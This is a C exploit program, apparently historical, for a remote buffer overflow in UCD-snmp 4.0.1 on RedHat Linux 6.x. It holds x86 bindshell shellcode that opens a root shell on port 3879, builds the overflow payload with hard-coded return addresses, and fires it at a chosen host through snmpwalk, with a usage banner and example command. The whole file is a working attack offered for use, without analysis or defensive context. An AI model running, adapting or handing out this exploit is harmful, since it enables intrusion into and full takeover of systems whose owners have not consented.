/*
**
** Remote SNMPd Linux x86 root exploit
** __
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
** My World: http://x82.i21c.net
**
*/

#include <stdio.h>
#include <getopt.h>

#define DEFAULT 0
#define VALUES 68
#define HOST "127.0.0.1"
#define DEFAULT_CODE 0xbfffd83c /* RedHat Linux 6.x ucd-snmp-4.x.x */
#define SNMPWALK "/usr/bin/snmpwalk" /* snmpwalk PATH */

int main(int argc, char *argv[])
{
    char shellcode[] = /* Linux(x86) bindshell on port 3879 */
	"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
	"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
	"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
	"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
	"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
	"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
	"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
	"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";
    
    char xOx[257];
    char connect[100];
    char host[]=HOST;
    char snmpwalk[]=SNMPWALK; 
    int count=DEFAULT;
    int num_1=DEFAULT;
    int num_2=DEFAULT;
    int num_3=DEFAULT;
    int jobst=DEFAULT;
    int values=VALUES;

    unsigned long shelladdr=DEFAULT_CODE;

    memset(xOx,0,257);
    banrl();

    while((jobst=getopt(argc,argv,"h:s:v:"))!=EOF)
    {
	switch(jobst)
	{
	    case 'h':
		strcpy(host, optarg);
		break;
		
    
	    case 's':
		shelladdr=strtoul(optarg,NULL,0);
		break;
    
	    case 'v':
		values=atoi(optarg);
		break;
    
	    case '?':
		usages(argv[0]);
		exit(0); 
    
	}
    }

    if((0x100-values)<0x00000082)
    {
	fprintf(stdout,"\n - Values error. :-(\n\n");
	fprintf(stdout," Space that shellcode comes is so narrow.\n");
	fprintf(stdout," Compose exploit again.\n\n");
	exit(0);
    
    }
    for(num_2=0;num_2<(0x100-values)-strlen(shellcode);num_2++)
    {
	xOx[count++]='@';
    }
    for(num_3=0;num_3<strlen(shellcode);num_3++)
    {
	xOx[count++]=shellcode[num_3];
    }
    for(num_1=0;num_1<values;num_1+=4)
    {
        xOx[count++]=(shelladdr>>0)&0xff;
        xOx[count++]=(shelladdr>>8)&0xff;
        xOx[count++]=(shelladdr>>16)&0xff;
        xOx[count++]=(shelladdr>>24)&0xff;
    }  

    fprintf(stdout," Shellcode Address: %p\n", shelladdr);
    fprintf(stdout," Host: %s\n", host);
    fprintf(stdout," [&shellcode: %dbyte] [NOP + shellcode: %dbyte] [0x00] - total 257byte\n",values,256-values);
    fprintf(stdout," Open Port: 3879 (Default)\n\n");
    
    execl(snmpwalk, "snmpwalk", host, xOx, NULL);

}

banrl()
{
    fprintf(stdout,"\n UCD-snmp-4.0.1-5 Remote Buffer Overflow exploit\n\n");
    fprintf(stdout,"\t\t       Exploit made by Xpl017Elz\n\n");
}

usages(char *var)
{ 
    fprintf(stderr,"\n Usage: %s -h [hostname] -s [address] -v [value]\n",var);
    fprintf(stderr,"\n option: -h - IP address & Domain name");
    fprintf(stderr,"\n         -s - Shellcode Address");
    fprintf(stderr,"\n         -v - &Shellcode Size\n\n");
    fprintf(stderr,"\n example: %s -h 127.0.0.1 -s 0xbfffd710 -v 112\n\n",var);

}